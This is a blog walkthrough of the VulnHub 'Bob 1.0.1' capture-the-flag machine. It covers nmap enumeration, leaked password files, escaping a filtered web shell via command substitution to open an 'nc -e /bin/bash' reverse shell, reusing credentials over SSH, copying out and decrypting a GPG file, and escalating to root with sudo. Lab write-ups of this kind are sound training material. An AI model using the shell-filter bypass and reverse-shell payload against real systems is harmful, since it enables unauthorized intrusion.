Bob 1.0.1 – Writeup - The Hacking Blog (2024)

This machine is https://www.vulnhub.com/entry/bob-101,226/

I had to start by locating my target on the network using a host discovery scan

root@kali:~# nmap -sn 192.168.56.0/24Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-02 11:59 BSTNmap scan report for 192.168.56.1Host is up (0.0011s latency).MAC Address: 0A:00:27:00:00:16 (Unknown)Nmap scan report for 192.168.56.100Host is up (0.00047s latency).MAC Address: 08:00:27:DC:E0:98 (Oracle VirtualBox virtual NIC)Nmap scan report for 192.168.56.101Host is up (0.0010s latency).MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)Nmap scan report for 192.168.56.102Host is up.Nmap done: 256 IP addresses (4 hosts up) scanned in 27.56 seconds

Having used ifconfig on my machine I knew that I was running on 192.168.56.102 so the target must be 192.168.56.101. So I used a service discovery scan to see what I could find

root@kali:~# nmap -sV 192.168.56.101Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-02 12:01 BSTNmap scan report for 192.168.56.101Host is up (0.00087s latency).Not shown: 999 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.25 ((Debian))MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 19.74 seconds

Knowing there was an active webserver on the target, I first navigated to http://192.168.56.101 in browser

From here I began exploring the linked pages and source code of them, the first interesting thing I found was on the news page

SW4gb3RoZXIgbmV3cyBzb21lIGR1bWJhc3MgbWFkZSBhIGZpbGUgY2FsbGVkIHBhc3N3b3Jkcy5odG1sLCBjb21wbGV0ZWx5IGJyYWluZGVhZA0KDQotQm9i

This looked like base64 so I decoded it

In other news some dumbass made a file called passwords.html, completely braindead-Bob

I then went to /passwords.html encase it was still there

Which also had relevant things in the source

The mention of a webshell is interesting, and there is further reference to it on the login.html page

From the contacts page I then found a list of the IP dept, which may be useful when looking for accounts to compromise

I then began to dig for more information on this shell using dirbuster and manually trying some urls, but did not find it. So I moved back to nmap for further enumeration

root@kali:~# nmap -sV -p- 192.168.56.101Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-02 13:04 BSTNmap scan report for 192.168.56.101Host is up (0.00081s latency).Not shown: 65533 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.25 ((Debian))25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 24.85 seconds

I now knew where the ssh service was, but that isn’t helpful now. So I ran another scan to look into the services

root@kali:~# nmap -sC -p- 192.168.56.101Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-02 13:08 BSTNmap scan report for 192.168.56.101Host is up (0.00069s latency).Not shown: 65533 closed portsPORT STATE SERVICE80/tcp open http| http-robots.txt: 4 disallowed entries| /login.php /dev_shell.php /lat_memo.html|_/passwords.html|_http-title: Site doesn't have a title (text/html).25468/tcp open unknownMAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 20.16 seconds

Now I had some useful leads, I started with /lat_memo.html

This alerted me that the shell may be unauthenticated, but there are filters on the commands, so I headed over to /dev_shell.php

Now I had some form of command execution I needed a listener to receive any connection back from the machine

root@kali:~# nc -nlvp 4444listening on [any] 4444 ...

I then began to use the shell, first entering

nc -e /bin/bash 192.168.56.102 4444

This hadn’t worked, I then wanted to work out if I could run multiple commands at once, as often only the first one gets filtered. So I tried

pwd && pwd

But got the error again, I then tried this for multiple executions, and kept getting the error until I eventually tried

echo $(pwd)

Now I had command execution I tried

echo $(nc -e /bin/bash 192.168.56.102 4444)

And checked back on my listener

connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 56510

I now had a shell on the machine, but first I wanted a nicer one

$ python -c "import pty;pty.spawn('/bin/bash')"www-data@Milburg-High:/var/www/html$

Now I had a proper shell

I started by looking around

www-data@Milburg-High:/var/www/html$ ls -ladrwxr-xr-x 2 root root 4096 Mar 8 23:48 .drwxr-xr-x 3 root root 4096 Feb 28 19:03 ..-rw-r--r-- 1 root root 84 Mar 5 04:53 .hint-rw-r--r-- 1 root root 340400 Mar 4 14:09 WIP.jpg-rw-r--r-- 1 root root 2579 Mar 8 23:43 about.html-rw-r--r-- 1 root root 3145 Mar 4 14:09 contact.html-rw-r--r-- 1 root root 1396 Mar 4 14:09 dev_shell.php-rw-r--r-- 1 root root 1361 Mar 4 14:09 dev_shell.php.bak-rw-r--r-- 1 root root 1177950 Mar 4 14:09 dev_shell_back.png-rw-r--r-- 1 root root 1425 Mar 4 14:09 index.html-rw-r--r-- 1 root root 1425 Mar 4 14:09 index.html.bak-rw-r--r-- 1 root root 1925 Mar 4 14:09 lat_memo.html-rw-r--r-- 1 root root 1560 Mar 4 14:09 login.html-rw-r--r-- 1 root root 4086 Mar 4 14:09 news.html-rw-r--r-- 1 root root 673 Mar 8 23:43 passwords.html-rw-r--r-- 1 root root 111 Mar 4 14:09 robots.txt-rw-r--r-- 1 root root 26357 Mar 4 14:09 school_badge.png

First I checkout the file called .hint

www-data@Milburg-High:/var/www/html$ cat .hintHave you tried spawning a tty shell?Also don't forget to check for hidden files ;)

Well, I had already done that, and I am already doing that so the hint wasn’t helpful. Next I want to checkout the home dirs

www-data@Milburg-High:/var/www/html$ cd /homewww-data@Milburg-High:/home$ ls -ladrwxr-xr-x 6 root root 4096 Mar 4 13:45 .drwxr-xr-x 22 root root 4096 Mar 5 04:50 ..drwxr-xr-x 18 bob bob 4096 Mar 8 23:31 bobdrwxr-xr-x 15 elliot elliot 4096 Feb 27 18:38 elliotdrwxr-xr-x 15 jc jc 4096 Feb 27 18:20 jcdrwxr-xr-x 15 seb seb 4096 Mar 5 01:18 seb

I began at bobs

www-data@Milburg-High:/home$ cd bobwww-data@Milburg-High:/home/bob$ ls -ladrwxr-xr-x 18 bob bob 4096 Mar 8 23:31 .drwxr-xr-x 6 root root 4096 Mar 4 13:45 ..-rw------- 1 bob bob 1980 Mar 8 23:31 .ICEauthority-rw------- 1 bob bob 214 Mar 8 23:48 .Xauthority-rw------- 1 bob bob 6403 Mar 8 23:48 .bash_history-rw-r--r-- 1 bob bob 220 Feb 21 18:10 .bash_logout-rw-r--r-- 1 bob bob 3548 Mar 5 01:14 .bashrcdrwxr-xr-x 7 bob bob 4096 Feb 21 18:15 .cachedrwx------ 8 bob bob 4096 Feb 27 17:56 .config-rw-r--r-- 1 bob bob 55 Feb 21 18:22 .dmrcdrwxr-xr-x 2 bob bob 4096 Feb 21 19:48 .ftpdrwx------ 3 bob bob 4096 Mar 5 00:45 .gnupgdrwxr-xr-x 3 bob bob 4096 Feb 21 18:13 .localdrwx------ 4 bob bob 4096 Feb 21 18:13 .mozilladrwxr-xr-x 2 bob bob 4096 Mar 4 14:03 .nano-rw-r--r-- 1 bob bob 72 Mar 5 04:12 .old_passwordfile.html-rw-r--r-- 1 bob bob 675 Feb 21 18:10 .profiledrwx------ 2 bob bob 4096 Mar 5 02:45 .vnc-rw-r--r-- 1 bob bob 25211 Mar 8 23:31 .xfce4-session.verbose-log-rw-r--r-- 1 bob bob 27563 Mar 7 21:32 .xfce4-session.verbose-log.last-rw------- 1 bob bob 3672 Mar 8 23:48 .xsession-errors-rw------- 1 bob bob 2866 Mar 7 21:32 .xsession-errors.olddrwxr-xr-x 2 bob bob 4096 Feb 21 18:13 Desktopdrwxr-xr-x 3 bob bob 4096 Mar 5 01:02 Documentsdrwxr-xr-x 3 bob bob 4096 Mar 8 23:33 Downloadsdrwxr-xr-x 2 bob bob 4096 Feb 21 18:13 Musicdrwxr-xr-x 2 bob bob 4096 Feb 21 18:13 Picturesdrwxr-xr-x 2 bob bob 4096 Feb 21 18:13 Publicdrwxr-xr-x 2 bob bob 4096 Feb 21 18:13 Templatesdrwxr-xr-x 2 bob bob 4096 Feb 21 18:13 Videos

The .old_passwordfile.html looks interesting so I took a look at that

www-data@Milburg-High:/home/bob$ cat .old_passwordfile.html#<html><p>jc:Qwertyseb:T1tanium_Pa$$word_Hack3rs_Fear_M3</p></html>

Now I have creds which may be used for ssh, so I give it a go

root@kali:~# ssh [emailprotected] -p 25468 __ __ _ _ _ _____ | \/ (_) | | / ____| | \ / |_| | |__ _ _ _ __ __ _ | (___ ___ _ ____ _____ _ __ | |\/| | | | '_ \| | | | '__/ _` | \___ \ / _ \ '__\ \ / / _ \ '__| | | | | | | |_) | |_| | | | (_| | ____) | __/ | \ V / __/ | |_| |_|_|_|_.__/ \__,_|_| \__, | |_____/ \___|_| \_/ \___|_| __/ | |___/[emailprotected]'s password:

I then try Qwerty as the password

jc@Milburg-High:~$

Now I have proper ssh access. I begin to dig into what I can do

jc@Milburg-High:~$ sudo -lMatching Defaults entries for jc on Milburg-High: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser jc may run the following commands on Milburg-High: (ALL) NOPASSWD: /usr/bin/service apache2 * (root) NOPASSWD: /bin/systemctl start ssh

I don’t see a potential exploit here so I carry on looking into home folders, then in elliot’s I find something

jc@Milburg-High:/home/elliot$ ls -ladrwxr-xr-x 15 elliot elliot 4096 Feb 27 18:38 .drwxr-xr-x 6 root root 4096 Mar 4 13:45 ..-rw------- 1 elliot elliot 121 Mar 8 23:47 .bash_history-rw-r--r-- 1 elliot elliot 220 Feb 27 18:04 .bash_logout-rw-r--r-- 1 elliot elliot 3526 Feb 27 18:04 .bashrcdrwxr-xr-x 7 elliot elliot 4096 Feb 27 18:25 .cachedrwx------ 8 elliot elliot 4096 Feb 27 18:37 .configdrwxr-xr-x 2 elliot elliot 4096 Feb 27 18:25 Desktop-rw-r--r-- 1 elliot elliot 55 Feb 27 18:21 .dmrcdrwxr-xr-x 2 elliot elliot 4096 Feb 27 18:36 Documentsdrwxr-xr-x 2 elliot elliot 4096 Feb 27 18:25 Downloadsdrwx------ 3 elliot elliot 4096 Feb 27 18:21 .gnupg-rw------- 1 elliot elliot 0 Feb 27 18:38 .ICEauthoritydrwxr-xr-x 3 elliot elliot 4096 Feb 27 18:21 .localdrwx------ 4 elliot elliot 4096 Feb 27 18:21 .mozilladrwxr-xr-x 2 elliot elliot 4096 Feb 27 18:21 Musicdrwxr-xr-x 2 elliot elliot 4096 Feb 27 18:21 Pictures-rw-r--r-- 1 elliot elliot 675 Feb 27 18:04 .profiledrwxr-xr-x 2 elliot elliot 4096 Feb 27 18:21 Publicdrwxr-xr-x 2 elliot elliot 4096 Feb 27 18:21 Templates-rw-r--r-- 1 elliot elliot 1509 Feb 27 18:38 theadminisdumb.txtdrwxr-xr-x 2 elliot elliot 4096 Feb 27 18:21 Videos-rw------- 1 elliot elliot 55 Feb 27 18:21 .Xauthority-rw-r--r-- 1 elliot elliot 17258 Feb 27 18:38 .xfce4-session.verbose-log-rw------- 1 elliot elliot 4486 Feb 27 18:38 .xsession-errors

The file that interested me was theadminisdumb.txt so I check that out

cat theadminisdumb.txthey n there theadminisdumb.txt

This was weird, and after a bit of testing I noticed that the cat command had been replaced with a command that always displayed

hey n there [filename]

So I used less instead

jc@Milburg-High:/home/elliot$ less theadminisdumb.txtThe admin is dumb,In fact everyone in the IT dept is pretty bad but I can’t blame all of them the newbies Sebastian and James are quite new to managing a server so I can forgive them for that password file they made on the server. But the admin now he’s quite something. Thinks he knows more than everyone else in the dept, he always yells at Sebastian and James now they do some dumb stuff but their new and this is just a high-school server who cares, the only people that would try and hack into this are script kiddies. His wallpaper policy also is redundant, why do we need custom wallpapers that doesn’t do anything. I have been suggesting time and time again to Bob ways we could improve the security since he “cares” about it so much but he just yells at me and says I don’t know what i’m doing. Sebastian has noticed and I gave him some tips on better securing his account, I can’t say the same for his friend James who doesn’t care and made his password: Qwerty. To be honest James isn’t the worst bob is his stupid web shell has issues and I keep telling him what he needs to patch but he doesn’t care about what I have to say. it’s only a matter of time before it’s broken into so because of this I have changed my password totheadminisdumbI hope bob is fired after the future second breach because of his incompetence. I almost want to fix it myself but at the same time it doesn’t affect me if they get breached, I get paid, he gets fired it’s a good time.

Now I have some more creds of elliot:theadminisdumb so I su to elliot encase he has more access

jc@Milburg-High:/home/elliot$ su elliotelliot@Milburg-High:~$

I then check to see if I have more access

elliot@Milburg-High:~$ sudo -lMatching Defaults entries for elliot on Milburg-High: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser elliot may run the following commands on Milburg-High: (ALL) NOPASSWD: /usr/bin/service apache2 * (root) NOPASSWD: /bin/systemctl start ssh

So I don’t have more privs via sudo. So I go back to digging into files, eventually ending up in /home/bob/Documents

elliot@Milburg-High:/home/bob/Documents$ ls -ladrwxr-xr-x 3 bob bob 4096 Mar 5 01:02 .drwxr-xr-x 18 bob bob 4096 Mar 8 23:31 ..-rw-r--r-- 1 bob bob 91 Mar 5 00:58 login.txt.gpgdrwxr-xr-x 3 bob bob 4096 Mar 5 00:35 Secret-rw-r--r-- 1 bob bob 300 Mar 4 14:11 staff.txt

I then inspected these files

elliot@Milburg-High:/home/bob/Documents$ cat staff.txtSeb:Seems to like ElliotWants to do well at his jobGave me a backdoored FTP to instal that apparently Elliot gave himJames:Does nothingPretty LazyDoesn't give a sh*t about his jobElliot:Keeps to himselfAlways needs to challenge everything I doKeep an eye on himTry and get him fired

Not that helpful. But at least the cat command works properly on this account. Next I inspect the login.txt.gpg file as it looks like a file which is going to be encrypted

elliot@Milburg-High:/home/bob/Documents$ file login.txt.gpglogin.txt.gpg: GPG symmetrically encrypted data (AES cipher)

With nothing useful I started inspecting the folder

elliot@Milburg-High:/home/bob/Documents$ cd Secretelliot@Milburg-High:/home/bob/Documents/Secret$ ls -ladrwxr-xr-x 3 bob bob 4096 Mar 5 00:35 .drwxr-xr-x 3 bob bob 4096 Mar 5 01:02 ..drwxr-xr-x 4 bob bob 4096 Mar 5 00:39 Keep_Outelliot@Milburg-High:/home/bob/Documents/Secret$ cd Keep_Outelliot@Milburg-High:/home/bob/Documents/Secret/Keep_Out$drwxr-xr-x 4 bob bob 4096 Mar 5 00:39 .drwxr-xr-x 3 bob bob 4096 Mar 5 00:35 ..drwxr-xr-x 3 bob bob 4096 Mar 5 04:43 Not_p*rndrwxr-xr-x 2 bob bob 4096 Mar 5 00:39 p*rn

At this point I got bored of manually searching and used find

elliot@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ find . -type f./Not_p*rn/No_Lookie_In_Here/notes.sh./p*rn/no_p*rn_4_u

I then inspected these files

elliot@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ cat ./Not_p*rn/No_Lookie_In_Here/notes.sh#!/bin/bashclearecho "-= Notes =-"echo "Harry Potter is my faviorite"echo "Are you the real me?"echo "Right, I'm ordering pizza this is going nowhere"echo "People just don't get me"echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"echo "Cucumber"echo "Rest now your eyes are sleepy"echo "Are you gonna stop reading this yet?"echo "Time to fix the server"echo "Everyone is annoying"echo "Sticky notes gotta buy em"

This didn’t make much sense so I moved on, and the other file was empty. I decided to exfil the encrypted file

root@kali:~# scp -P 25468 [emailprotected]:/home/bob/Documents/login.txt.gpg login.txt.gpg

Using theadminisdumb as the password when promoted

login.txt.gpg 100% 91 28.8KB/s 00:00

I then dug around for ages, and eventually began to stare at the output of the notes.sh file, until I noticed that the first letter of every line spelt HARPOCRATES which I knew to be a god. This made me pretty sure notes.txt was a password reminder script. So I tried using HARPOCRATES as the passphrase to decrypt the login file

root@kali:~# gpg --batch --passphrase HARPOCRATES -d login.txt.gpggpg: AES encrypted datagpg: encrypted with 1 passphrasebob:b0bcat_

Now I have creds for bob, I su over to that account

elliot@Milburg-High:/home/bob/Documents$ su bobbob@Milburg-High:~/Documents$

Now to see what bob can do

bob@Milburg-High:~/Documents$ sudo -lMatching Defaults entries for bob on Milburg-High: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser bob may run the following commands on Milburg-High: (ALL : ALL) ALL

This means I can now get root

bob@Milburg-High:~/Documents$ sudo suroot@Milburg-High:/home/bob/Document#

Now all that was left to do was grab the flag

root@Milburg-High:/home/bob/Document# cd /root@Milburg-High:/# ls -ladrwxr-xr-x 22 root root 4096 Mar 5 04:50 .drwxr-xr-x 22 root root 4096 Mar 5 04:50 ..drwxr-xr-x 2 root root 4096 Feb 21 15:38 bindrwxr-xr-x 3 root root 4096 Feb 21 15:43 bootdrwxr-xr-x 17 root root 3000 Jul 2 06:57 devdrwxr-xr-x 114 root root 4096 Mar 8 23:48 etc-rw------- 1 root root 335 Mar 5 04:50 flag.txtdrwxr-xr-x 6 root root 4096 Mar 4 13:45 homelrwxrwxrwx 1 root root 29 Feb 21 15:16 initrd.img -> boot/initrd.img-4.9.0-4-amd64lrwxrwxrwx 1 root root 29 Feb 21 15:16 initrd.img.old -> boot/initrd.img-4.9.0-4-amd64drwxr-xr-x 15 root root 4096 Feb 21 15:40 libdrwxr-xr-x 2 root root 4096 Feb 21 15:14 lib64drwx------ 2 root root 16384 Feb 21 15:14 lost+founddrwxr-xr-x 3 root root 4096 Feb 21 15:14 mediadrwxr-xr-x 2 root root 4096 Feb 21 15:14 mntdrwxr-xr-x 2 root root 4096 Feb 21 15:14 optdr-xr-xr-x 115 root root 0 Jul 2 06:57 procdrwx------ 16 root root 4096 Feb 28 19:07 rootdrwxr-xr-x 23 root root 680 Jul 2 09:17 rundrwxr-xr-x 2 root root 4096 Feb 21 15:43 sbindrwxr-xr-x 3 root root 4096 Mar 4 13:42 srvdr-xr-xr-x 13 root root 0 Jul 2 08:57 sysdrwxrwxrwt 11 root root 4096 Jul 2 09:17 tmpdrwxr-xr-x 10 root root 4096 Feb 21 15:14 usrdrwxr-xr-x 12 root root 4096 Feb 28 19:03 varlrwxrwxrwx 1 root root 26 Feb 21 15:16 vmlinuz -> boot/vmlinuz-4.9.0-4-amd64lrwxrwxrwx 1 root root 26 Feb 21 15:16 vmlinuz.old -> boot/vmlinuz-4.9.0-4-amd64root@Milburg-High:/# cat flag.txtCONGRATS ON GAINING ROOT .-. ( ) |~| _.--._ |~|~:'--~' | | | : #root | | | : _.--._| |~|~`'--~' | | | | | | | | | | | | | | | | | | _____|_|_________ Thanks for playing ~c0rruptedb1t#

And with that the machine was completed!